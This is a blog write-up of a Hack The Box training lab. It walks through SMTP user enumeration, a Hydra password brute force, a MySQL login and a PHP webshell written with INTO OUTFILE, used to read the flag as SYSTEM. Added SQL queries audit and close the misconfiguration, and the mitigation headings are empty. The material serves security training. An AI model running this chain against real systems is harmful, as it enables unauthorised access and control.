Attacking Common Services-Easy

j35se's blog


Scope of work #

Find the HTB flag on the server that manages emails, customers, and their files. The IP of the target system is 10.129.203.7.

Information Gathering #

I set the $IP variable to 10.129.203.7 in .zshrc and ran an Nmap scan:

nmap -Pn -sS -sV -sC -p- $IP -oA easy.scan -v

21/tcp   open  ftp
25/tcp   open  smtp          hMailServer smtpd
80/tcp   open  http          Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/7.4.29)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
443/tcp  open  ssl/https
587/tcp  open  smtp          hMailServer smtpd
3306/tcp open  mysql         MariaDB 5.5.5-10.4.24
3389/tcp open  ms-wbt-server Microsoft Terminal Services

http://10.129.203.7 took me to a generic webpage for XAMPP. https://10.129.203.7 prompted me for a username and password. I tried a few common combinations, but nothing worked.

Using the provided username list in resources, I was able to find a valid user.
smtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t $IP

fiona@inlanefreight.htb

With a username, I used Hydra to see if I could find a usable password.
hydra -l fiona@inlanefreight.htb -P /usr/share/wordlists/rockyou.txt.gz smtp://$IP

Hydra returned a successful password for the username.
host: 10.129.203.7 login: fiona@inlanefreight.htb password: 987654321

fiona:987654321

With a usable username and password, I tried to access the https page. The credentials let me log in. There are two files in there. The one with useful information is called webserver.txt:

CoreFTP:
Directory C:\CoreFTP
Ports: 21 & 443
Test Command: curl -k -H "Host: localhost" --basic -u <username>:<password> https://localhost/docs.txt

Apache
Directory "C:\xampp\htdocs\"
Ports: 80 & 4443
Test Command: curl http://localhost/test.php

Not sure what to do with this information, I made an attempt to log in to MySQL.
mysql -u fiona -p987654321 -h $IP --ssl=FALSE

After looking through the databases and tables for anything useful, I needed to look at the walkthrough. I was on the right track, but looking for the wrong things. I needed to look at the variables, specifically secure_file_priv. When this is blank, a logged-in user can upload a file anywhere. I used show variables where value = ''; and found that the value is blank.

Exploitation #

Again, using the walkthrough, I entered the following to upload a webshell:

SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE 'C:/xampp/htdocs/webshell.php';

'c' is an arbitrary parameter name; the command to run is whatever follows it in the URL. Going back to the information in webserver.txt, it tells me the directory I need to upload the file to is C:\xampp\htdocs.
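The write above works because of two things on the MariaDB side: secure_file_priv is empty, so INTO OUTFILE is not confined to a directory, and the account holds the global FILE privilege, which INTO OUTFILE additionally requires. The following is an added example, not part of the original writeup or the HTB lab material: the queries an administrator would run to audit that configuration and close it. The account host in 'fiona'@'%' and the directory chosen for secure_file_priv are assumptions; take the real host from the SHOW GRANTS output.

```sql
-- Added example: audit and remediation queries for the misconfiguration the
-- writeup relied on. The host part of 'fiona'@'%' is an assumption.

-- 1. The setting the writeup keyed on. An empty value means SELECT ... INTO
--    OUTFILE and LOAD_FILE() are not confined to any directory; a directory
--    path confines them to that path.
SHOW VARIABLES LIKE 'secure_file_priv';

-- 2. INTO OUTFILE also needs the global FILE privilege, so list every
--    account that holds it. Application and mail accounts should not appear.
SELECT user, host FROM mysql.user WHERE File_priv = 'Y';

-- 3. Inspect the specific account from the writeup and remove FILE from it.
SHOW GRANTS FOR 'fiona'@'%';
REVOKE FILE ON *.* FROM 'fiona'@'%';

-- 4. The writeup reached port 3306 from outside the host. If the account
--    only needs local access, pin it to localhost instead of '%'.
RENAME USER 'fiona'@'%' TO 'fiona'@'localhost';

-- 5. secure_file_priv is not dynamic; SET GLOBAL will not change it. Set it
--    in my.ini under [mysqld] and restart the service, for example
--    (directory is illustrative):
--      secure_file_priv = "C:/xampp/mysql/data/"
--    Re-run step 1 after the restart to confirm the new value.
```

Steps 1 and 2 are the detection half: a blank secure_file_priv combined with FILE on any account that can connect remotely is exactly the combination that lets a database login turn into a file on disk. Step 5 has to go through the configuration file because the variable is read-only at runtime.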

Post Exploitation #

If the commands aren't working in the URL, replace the spaces with %20. http://website/hello there will become http://website/hello%20there

With the shell uploaded, I opened Firefox to try a few commands. The first one I tried was http://10.129.203.7/webshell.php?c=whoami and saw that I'm nt authority\system.

With system-level access, I started looking for the flag. To search for it, I used:

http://10.129.203.7/webshell.php?c=dir C:\Users /s /b | findstr flag.txt

It returned the following:

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\flag.txt.lnk
C:\Users\Administrator\Desktop\flag.txt

With the location of flag.txt, I simply needed to read its contents. To do this, I typed the following and was able to capture the flag:

http://10.129.203.7/webshell.php?c=type C:\Users\Administrator\Desktop\flag.txt

Mitigation Recommendations #

Lessons Learned #
